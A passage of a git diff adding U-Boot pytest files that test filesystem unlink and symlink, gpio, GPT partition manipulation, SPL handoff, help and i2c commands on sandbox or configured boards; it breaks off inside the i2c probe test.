$filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink4(self, u_boot_console, fs_obj_symlink): + """ + Test Case 4 - create a broken link + """ + fs_type, fs_img, md5val = fs_obj_symlink + with u_boot_console.log.section('Test Case 1 - create link and read'): + + output = u_boot_console.run_command_list([ + 'setenv filesize', + 'ln host 0:0 nowhere /link ', + ]) + assert('' in ''.join(output)) + + output = u_boot_console.run_command( + '%sload host 0:0 %x /link' % + (fs_type, ADDR)) + with u_boot_console.disable_check('error_notification'): + output = u_boot_console.run_command('printenv filesize') + assert('"filesize" not defined' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_unlink.py b/test/py/tests/test_fs/test_unlink.py new file mode 100644 index 00000000000..97aafc63bb5 --- /dev/null +++ b/test/py/tests/test_fs/test_unlink.py @@ -0,0 +1,118 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:unlink Test + +""" +This test verifies unlink operation (deleting a file or a directory) +on file system. +""" + +import pytest +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestUnlink(object): + def test_unlink1(self, u_boot_console, fs_obj_unlink): + """ + Test Case 1 - delete a file + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 1 - unlink (file)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir1/file1' % fs_type, + '%sls host 0:0 dir1/file1' % fs_type]) + assert('' == ''.join(output)) + + output = u_boot_console.run_command( + '%sls host 0:0 dir1/' % fs_type) + assert(not 'file1' in output) + assert('file2' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink2(self, u_boot_console, fs_obj_unlink): + """ + Test Case 2 - delete many files + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 2 - unlink (many)'): + output = u_boot_console.run_command('host bind 0 %s' % fs_img) + + for i in range(0, 20): + output = u_boot_console.run_command_list([ + '%srm host 0:0 dir2/0123456789abcdef%02x' % (fs_type, i), + '%sls host 0:0 dir2/0123456789abcdef%02x' % (fs_type, i)]) + assert('' == ''.join(output)) + + output = u_boot_console.run_command( + '%sls host 0:0 dir2' % fs_type) + assert('0 file(s), 2 dir(s)' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink3(self, u_boot_console, fs_obj_unlink): + """ + Test Case 3 - trying to delete a non-existing file should fail + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 3 - unlink (non-existing)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir1/nofile' % fs_type]) + assert('nofile: doesn\'t exist' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink4(self, u_boot_console, fs_obj_unlink): + """ + Test Case 4 - delete an empty directory + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 4 - unlink (directory)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir4' % fs_type]) + assert('' == ''.join(output)) + + output = u_boot_console.run_command( + '%sls host 0:0 /' % fs_type) + assert(not 'dir4' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink5(self, u_boot_console, fs_obj_unlink): + """ + Test Case 5 - trying to deleting a non-empty directory ".." + should fail + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 5 - unlink ("non-empty directory")'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink6(self, u_boot_console, fs_obj_unlink): + """ + Test Case 6 - trying to deleting a "." should fail + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 6 - unlink (".")'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5/.' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink7(self, u_boot_console, fs_obj_unlink): + """ + Test Case 7 - trying to deleting a ".." should fail + """ + fs_type,fs_img = fs_obj_unlink + with u_boot_console.log.section('Test Case 7 - unlink ("..")'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5/..' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_gpio.py b/test/py/tests/test_gpio.py new file mode 100644 index 00000000000..3e16e636574 --- /dev/null +++ b/test/py/tests/test_gpio.py @@ -0,0 +1,315 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2021 Adarsh Babu Kalepalli <opensource.kab@gmail.com> +# Copyright (c) 2020 Alex Kiernan <alex.kiernan@gmail.com> + +import pytest +import time +import u_boot_utils + +""" + test_gpio_input is intended to test the fix 4dbc107f4683. + 4dbc107f4683:"cmd: gpio: Correct do_gpio() return value" +""" + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_input(u_boot_console): + """Test that gpio input correctly returns the value of a gpio pin.""" + + response = u_boot_console.run_command('gpio input 0; echo rc:$?') + expected_response = 'rc:0' + assert(expected_response in response) + response = u_boot_console.run_command('gpio toggle 0; gpio input 0; echo rc:$?') + expected_response = 'rc:1' + assert(expected_response in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_exit_statuses(u_boot_console): + """Test that non-input gpio commands correctly return the command + success/failure status.""" + + expected_response = 'rc:0' + response = u_boot_console.run_command('gpio clear 0; echo rc:$?') + assert(expected_response in response) + response = u_boot_console.run_command('gpio set 0; echo rc:$?') + assert(expected_response in response) + response = u_boot_console.run_command('gpio toggle 0; echo rc:$?') + assert(expected_response in response) + response = u_boot_console.run_command('gpio status -a; echo rc:$?') + assert(expected_response in response) + + expected_response = 'rc:1' + response = u_boot_console.run_command('gpio nonexistent-command; echo rc:$?') + assert(expected_response in response) + response = u_boot_console.run_command('gpio input 200; echo rc:$?') + assert(expected_response in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_read(u_boot_console): + """Test that gpio read correctly sets the variable to the value of a gpio pin.""" + + u_boot_console.run_command('gpio clear 0') + response = u_boot_console.run_command('gpio read var 0; echo val:$var,rc:$?') + expected_response = 'val:0,rc:0' + assert(expected_response in response) + response = u_boot_console.run_command('gpio toggle 0; gpio read var 0; echo val:$var,rc:$?') + expected_response = 'val:1,rc:0' + assert(expected_response in response) + response = u_boot_console.run_command('setenv var; gpio read var nonexistent-gpio; echo val:$var,rc:$?') + expected_response = 'val:,rc:1' + assert(expected_response in response) + +""" +Generic Tests for 'gpio' command on sandbox and real hardware. +The below sequence of tests rely on env__gpio_dev_config for configuration values of gpio pins. + + Configuration data for gpio command. + The set,clear,toggle ,input and status options of 'gpio' command are verified. + For sake of verification,A LED/buzzer could be connected to GPIO pins configured as O/P. + Logic level '1'/'0' can be applied onto GPIO pins configured as I/P + + +env__gpio_dev_config = { + #the number of 'gpio_str_x' strings should equal to + #'gpio_str_count' value + 'gpio_str_count':4 , + 'gpio_str_1': '0', + 'gpio_str_2': '31', + 'gpio_str_3': '63', + 'gpio_str_4': '127', + 'gpio_op_pin': '64', + 'gpio_ip_pin_set':'65', + 'gpio_ip_pin_clear':'66', + 'gpio_clear_value': 'value is 0', + 'gpio_set_value': 'value is 1', + # GPIO pin list to test gpio functionality for each pins, pin should be + # pin names (str) + 'gpio_pin_list': ['gpio@1000031', 'gpio@1000032', 'gpio@20000033'], + # GPIO input output list for shorted gpio pins to test gpio + # functionality for each of pairs, where the first element is + # configured as input and second as output + 'gpio_ip_op_list': [['gpio0', 'gpio1'], ['gpio2', 'gpio3']], +} +""" + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_status_all_generic(u_boot_console): + """Test the 'gpio status' command. + + Displays all gpio pins available on the Board. + To verify if the status of pins is displayed or not, + the user can configure (gpio_str_count) and verify existence of certain + pins.The details of these can be configured in 'gpio_str_n'. + of boardenv_* (example above).User can configure any + number of such pins and mention that count in 'gpio_str_count'. + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_str_count = f['gpio_str_count'] + + #Display all the GPIO ports + cmd = 'gpio status -a' + response = u_boot_console.run_command(cmd) + + for str_value in range(1,gpio_str_count + 1): + assert f["gpio_str_%d" %(str_value)] in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_set_generic(u_boot_console): + """Test the 'gpio set' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'set' option + + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_set_value = f['gpio_set_value']; + + + cmd = 'gpio set ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_clear_generic(u_boot_console): + """Test the 'gpio clear' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'clear' option + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_clear_value = f['gpio_clear_value']; + + + cmd = 'gpio clear ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_toggle_generic(u_boot_console): + """Test the 'gpio toggle' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'toggle' option + """ + + + f = u_boot_console.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_set_value = f['gpio_set_value']; + gpio_clear_value = f['gpio_clear_value']; + + cmd = 'gpio set ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + + cmd = 'gpio toggle ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_input_generic(u_boot_console): + """Test the 'gpio input' command. + + Specific gpio pins configured by user as input + (mentioned in gpio_ip_pin_set and gpio_ip_pin_clear) + is verified for logic '1' and logic '0' states + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_ip_pin_clear']; + gpio_clear_value = f['gpio_clear_value']; + + + cmd = 'gpio input ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + + gpio_pin_adr = f['gpio_ip_pin_set']; + gpio_set_value = f['gpio_set_value']; + + + cmd = 'gpio input ' + gpio_pin_adr + response = u_boot_console.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_pins_generic(u_boot_console): + """Test various gpio related functionality, such as the input, set, clear, + and toggle for the set of gpio pin list. + + Specific set of gpio pins (by mentioning gpio pin name) configured as + input (mentioned as 'gpio_pin_list') to be tested for multiple gpio + commands. + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config', False) + if not f: + pytest.skip('gpio not configured') + + gpio_pins = f.get('gpio_pin_list', None) + if not gpio_pins: + pytest.skip('gpio pin list are not configured') + + for gpin in gpio_pins: + # gpio input + u_boot_console.run_command(f'gpio input {gpin}') + expected_response = f'{gpin}: input:' + response = u_boot_console.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio set + u_boot_console.run_command(f'gpio set {gpin}') + expected_response = f'{gpin}: output: 1' + response = u_boot_console.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio clear + u_boot_console.run_command(f'gpio clear {gpin}') + expected_response = f'{gpin}: output: 0' + response = u_boot_console.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio toggle + u_boot_console.run_command(f'gpio toggle {gpin}') + expected_response = f'{gpin}: output: 1' + response = u_boot_console.run_command(f'gpio status -a {gpin}') + assert expected_response in response + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_pins_input_output_generic(u_boot_console): + """Test gpio related functionality such as input and output for the list of + shorted gpio pins provided as a pair of input and output pins. This test + will fail, if the gpio pins are not shorted properly. + + Specific set of shorted gpio pins (by mentioning gpio pin name) + configured as input and output (mentioned as 'gpio_ip_op_list') as a + pair to be tested for gpio input output case. + """ + + f = u_boot_console.config.env.get('env__gpio_dev_config', False) + if not f: + pytest.skip('gpio not configured') + + gpio_pins = f.get('gpio_ip_op_list', None) + if not gpio_pins: + pytest.skip('gpio pin list for input and output are not configured') + + for gpins in gpio_pins: + u_boot_console.run_command(f'gpio input {gpins[0]}') + expected_response = f'{gpins[0]}: input:' + response = u_boot_console.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response + + u_boot_console.run_command(f'gpio set {gpins[1]}') + expected_response = f'{gpins[1]}: output:' + response = u_boot_console.run_command(f'gpio status -a {gpins[1]}') + assert expected_response in response + + u_boot_console.run_command(f'gpio clear {gpins[1]}') + expected_response = f'{gpins[0]}: input: 0' + response = u_boot_console.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response + + u_boot_console.run_command(f'gpio set {gpins[1]}') + expected_response = f'{gpins[0]}: input: 1' + response = u_boot_console.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response diff --git a/test/py/tests/test_gpt.py b/test/py/tests/test_gpt.py new file mode 100644 index 00000000000..6e135b663e8 --- /dev/null +++ b/test/py/tests/test_gpt.py @@ -0,0 +1,350 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2017 Alison Chaiken +# Copyright (c) 2017, NVIDIA CORPORATION. All rights reserved. + +# Test GPT manipulation commands. + +import os +import pytest +import u_boot_utils + +""" +These tests rely on a 4 MB disk image, which is automatically created by +the test. +""" + +# Mark all tests here as slow +pytestmark = pytest.mark.slow + +def parse_gpt_parts(disk_str): + """Parser a partition string into a list of partitions. + + Args: + disk_str: The disk description string, as returned by `gpt read` + + Returns: + A list of parsed partitions. Each partition is a dictionary with the + string value from each specified key in the partition description, or a + key with with the value True for a boolean flag + """ + parts = [] + for part_str in disk_str.split(';'): + part = {} + for option in part_str.split(","): + if not option: + continue + + if "=" in option: + key, value = option.split("=") + part[key] = value + else: + part[option] = True + + if part: + parts.append(part) + + return parts + +class GptTestDiskImage(object): + """Disk Image used by the GPT tests.""" + + def __init__(self, u_boot_console): + """Initialize a new GptTestDiskImage object. + + Args: + u_boot_console: A U-Boot console. + + Returns: + Nothing. + """ + + filename = 'test_gpt_disk_image.bin' + + persistent = u_boot_console.config.persistent_data_dir + '/' + filename + self.path = u_boot_console.config.result_dir + '/' + filename + + with u_boot_utils.persistent_file_helper(u_boot_console.log, persistent): + if os.path.exists(persistent): + u_boot_console.log.action('Disk image file ' + persistent + + ' already exists') + else: + u_boot_console.log.action('Generating ' + persistent) + fd = os.open(persistent, os.O_RDWR | os.O_CREAT) + os.ftruncate(fd, 4194304) + os.close(fd) + cmd = ('sgdisk', + '--disk-guid=375a56f7-d6c9-4e81-b5f0-09d41ca89efe', + persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + # part1 offset 1MB size 1MB + cmd = ('sgdisk', '--new=1:2048:4095', '--change-name=1:part1', + '--partition-guid=1:33194895-67f6-4561-8457-6fdeed4f50a3', + '-A 1:set:2', + persistent) + # part2 offset 2MB size 1.5MB + u_boot_utils.run_and_log(u_boot_console, cmd) + cmd = ('sgdisk', '--new=2:4096:7167', '--change-name=2:part2', + '--partition-guid=2:cc9c6e4a-6551-4cb5-87be-3210f96c86fb', + persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + cmd = ('sgdisk', '--load-backup=' + persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + + cmd = ('cp', persistent, self.path) + u_boot_utils.run_and_log(u_boot_console, cmd) + +@pytest.fixture(scope='function') +def state_disk_image(u_boot_console): + """pytest fixture to provide a GptTestDiskImage object to tests. + This is function-scoped because it uses u_boot_console, which is also + function-scoped. A new disk is returned each time to prevent tests from + interfering with each other.""" + + return GptTestDiskImage(u_boot_console) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_read(state_disk_image, u_boot_console): + """Test the gpt read command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt read host 0') + assert 'Start 1MiB, size 1MiB' in output + assert 'Block size 512, name part1' in output + assert 'Start 2MiB, size 1MiB' in output + assert 'Block size 512, name part2' in output + output = u_boot_console.run_command('part list host 0') + assert '0x00000800 0x00000fff "part1"' in output + assert '0x00001000 0x00001bff "part2"' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('partition_type_guid') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_read_var(state_disk_image, u_boot_console): + """Test the gpt read command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt read host 0 gpt_parts') + assert 'success!' in output + + output = u_boot_console.run_command('echo ${gpt_parts}') + parts = parse_gpt_parts(output.rstrip()) + + assert parts == [ + { + "uuid_disk": "375a56f7-d6c9-4e81-b5f0-09d41ca89efe", + }, + { + "name": "part1", + "start": "0x100000", + "size": "0x100000", + "type": "0fc63daf-8483-4772-8e79-3d69d8477de4", + "uuid": "33194895-67f6-4561-8457-6fdeed4f50a3", + "bootable": True, + }, + { + "name": "part2", + "start": "0x200000", + "size": "0x180000", + "type": "0fc63daf-8483-4772-8e79-3d69d8477de4", + "uuid": "cc9c6e4a-6551-4cb5-87be-3210f96c86fb", + }, + ] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_verify(state_disk_image, u_boot_console): + """Test the gpt verify command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt verify host 0') + assert 'Verify GPT: success!' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_repair(state_disk_image, u_boot_console): + """Test the gpt repair command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt repair host 0') + assert 'Repairing GPT: success!' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_guid(state_disk_image, u_boot_console): + """Test the gpt guid command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt guid host 0') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_setenv(state_disk_image, u_boot_console): + """Test the gpt setenv command.""" + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt setenv host 0 part1') + assert 'success!' in output + output = u_boot_console.run_command('echo ${gpt_partition_addr}') + assert output.rstrip() == '800' + output = u_boot_console.run_command('echo ${gpt_partition_size}') + assert output.rstrip() == '800' + output = u_boot_console.run_command('echo ${gpt_partition_name}') + assert output.rstrip() == 'part1' + output = u_boot_console.run_command('echo ${gpt_partition_entry}') + assert output.rstrip() == '1' + output = u_boot_console.run_command('echo ${gpt_partition_bootable}') + assert output.rstrip() == '1' + + output = u_boot_console.run_command('gpt setenv host 0 part2') + assert 'success!' in output + output = u_boot_console.run_command('echo ${gpt_partition_addr}') + assert output.rstrip() == '1000' + output = u_boot_console.run_command('echo ${gpt_partition_size}') + assert output.rstrip() == 'c00' + output = u_boot_console.run_command('echo ${gpt_partition_name}') + assert output.rstrip() == 'part2' + output = u_boot_console.run_command('echo ${gpt_partition_entry}') + assert output.rstrip() == '2' + output = u_boot_console.run_command('echo ${gpt_partition_bootable}') + assert output.rstrip() == '0' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_save_guid(state_disk_image, u_boot_console): + """Test the gpt guid command to save GUID into a string.""" + + if u_boot_console.config.buildconfig.get('config_cmd_gpt', 'n') != 'y': + pytest.skip('gpt command not supported') + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt guid host 0 newguid') + output = u_boot_console.run_command('printenv newguid') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_part_type_uuid(state_disk_image, u_boot_console): + """Test the gpt partittion type UUID command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('part type host 0:1') + assert '0fc63daf-8483-4772-8e79-3d69d8477de4' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_part_type_save_uuid(state_disk_image, u_boot_console): + """Test the gpt partittion type to save UUID into a string.""" + + if u_boot_console.config.buildconfig.get('config_cmd_gpt', 'n') != 'y': + pytest.skip('gpt command not supported') + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('part type host 0:1 newguid') + output = u_boot_console.run_command('printenv newguid') + assert '0fc63daf-8483-4772-8e79-3d69d8477de4' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_rename_partition(state_disk_image, u_boot_console): + """Test the gpt rename command to write partition names.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + u_boot_console.run_command('gpt rename host 0 1 first') + output = u_boot_console.run_command('gpt read host 0') + assert 'name first' in output + u_boot_console.run_command('gpt rename host 0 2 second') + output = u_boot_console.run_command('gpt read host 0') + assert 'name second' in output + output = u_boot_console.run_command('part list host 0') + assert '0x00000800 0x00000fff "first"' in output + assert '0x00001000 0x00001bff "second"' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_swap_partitions(state_disk_image, u_boot_console): + """Test the gpt swap command to exchange two partition names.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('part list host 0') + assert '0x00000800 0x00000fff "part1"' in output + assert '0x00001000 0x00001bff "part2"' in output + u_boot_console.run_command('gpt swap host 0 part1 part2') + output = u_boot_console.run_command('part list host 0') + assert '0x00000800 0x00000fff "part2"' in output + assert '0x00001000 0x00001bff "part1"' in output + +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_set_bootable(state_disk_image, u_boot_console): + """Test the gpt set-bootable command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + parts = ('part2', 'part1') + for bootable in parts: + output = u_boot_console.run_command(f'gpt set-bootable host 0 {bootable}') + assert 'success!' in output + + for p in parts: + output = u_boot_console.run_command(f'gpt setenv host 0 {p}') + assert 'success!' in output + output = u_boot_console.run_command('echo ${gpt_partition_bootable}') + if p == bootable: + assert output.rstrip() == '1' + else: + assert output.rstrip() == '0' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_write(state_disk_image, u_boot_console): + """Test the gpt write command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('gpt write host 0 "name=all,size=0"') + assert 'Writing GPT: success!' in output + output = u_boot_console.run_command('part list host 0') + assert '0x00000022 0x00001fde "all"' in output + output = u_boot_console.run_command('gpt write host 0 "uuid_disk=375a56f7-d6c9-4e81-b5f0-09d41ca89efe;name=first,start=1M,size=1M;name=second,start=0x200000,size=0x180000;"') + assert 'Writing GPT: success!' in output + output = u_boot_console.run_command('part list host 0') + assert '0x00000800 0x00000fff "first"' in output + assert '0x00001000 0x00001bff "second"' in output + output = u_boot_console.run_command('gpt guid host 0') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_transpose(state_disk_image, u_boot_console): + """Test the gpt transpose command.""" + + u_boot_console.run_command('host bind 0 ' + state_disk_image.path) + output = u_boot_console.run_command('part list host 0') + assert '1\t0x00000800\t0x00000fff\t"part1"' in output + assert '2\t0x00001000\t0x00001bff\t"part2"' in output + + output = u_boot_console.run_command('gpt transpose host 0 1 2') + assert 'success!' in output + + output = u_boot_console.run_command('part list host 0') + assert '2\t0x00000800\t0x00000fff\t"part1"' in output + assert '1\t0x00001000\t0x00001bff\t"part2"' in output diff --git a/test/py/tests/test_handoff.py b/test/py/tests/test_handoff.py new file mode 100644 index 00000000000..038f03064a6 --- /dev/null +++ b/test/py/tests/test_handoff.py @@ -0,0 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016 Google, Inc + +import pytest + +# Magic number to check that SPL handoff is working +TEST_HANDOFF_MAGIC = 0x14f93c7b + +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.buildconfigspec('spl') +def test_handoff(u_boot_console): + """Test that of-platdata can be generated and used in sandbox""" + cons = u_boot_console + response = cons.run_command('sb handoff') + assert ('SPL handoff magic %x' % TEST_HANDOFF_MAGIC) in response diff --git a/test/py/tests/test_help.py b/test/py/tests/test_help.py new file mode 100644 index 00000000000..153133cf28f --- /dev/null +++ b/test/py/tests/test_help.py @@ -0,0 +1,34 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +import pytest + +def test_help(u_boot_console): + """Test that the "help" command can be executed.""" + + u_boot_console.run_command('help') + +@pytest.mark.boardspec('sandbox') +def test_help_no_devicetree(u_boot_console): + try: + cons = u_boot_console + cons.restart_uboot_with_flags([], use_dtb=False) + cons.run_command('help') + output = cons.get_spawn_output().replace('\r', '') + assert 'print command description/usage' in output + finally: + # Restart afterward to get the normal device tree back + u_boot_console.restart_uboot() + +@pytest.mark.boardspec('sandbox_vpl') +def test_vpl_help(u_boot_console): + try: + cons = u_boot_console + cons.restart_uboot() + cons.run_command('help') + output = cons.get_spawn_output().replace('\r', '') + assert 'print command description/usage' in output + finally: + # Restart afterward to get the normal device tree back + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_i2c.py b/test/py/tests/test_i2c.py new file mode 100644 index 00000000000..825d0c2e6eb --- /dev/null +++ b/test/py/tests/test_i2c.py @@ -0,0 +1,116 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +the i2c device info including the bus list and eeprom address/value. This test +will be automatically skipped without this. + +For example: + +# Setup env__i2c_device_test to set the i2c bus list and probe_all boolean +# parameter. For i2c_probe_all_buses case, if probe_all parameter is set to +# False then it probes all the buses listed in bus_list instead of probing all +# the buses available. +env__i2c_device_test = { + 'bus_list': [0, 2, 5, 12, 16, 18], + 'probe_all': False, +} + +# Setup env__i2c_eeprom_device_test to set the i2c bus number, eeprom address +# and configured value for i2c_eeprom test case. Test will be skipped if +# env__i2c_eeprom_device_test is not set +env__i2c_eeprom_device_test = { + 'bus': 3, + 'eeprom_addr': 0x54, + 'eeprom_val': '30 31', +} +""" + +def get_i2c_test_env(u_boot_console): + f = u_boot_console.config.env.get("env__i2c_device_test", None) + if not f: + pytest.skip("No I2C device to test!") + else: + bus_list = f.get("bus_list", None) + if not bus_list: + pytest.skip("I2C bus list is not provided!") + probe_all = f.get("probe_all", False) + return bus_list, probe_all + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_bus(u_boot_console): + bus_list, probe = get_i2c_test_env(u_boot_console) + bus = random.choice(bus_list) + expected_response = f"Bus {bus}:" + response = u_boot_console.run_command("i2c bus") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_dev(u_boot_console): + bus_list, probe = get_i2c_test_env(u_boot_console) + expected_response = "Current bus is" + response = u_boot_console.run_command("i2c dev") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_probe(u_boot_console): + bus_list, probe = get_i2c_test_env(u_boot_console) + bus = random.choice(bus_list) + 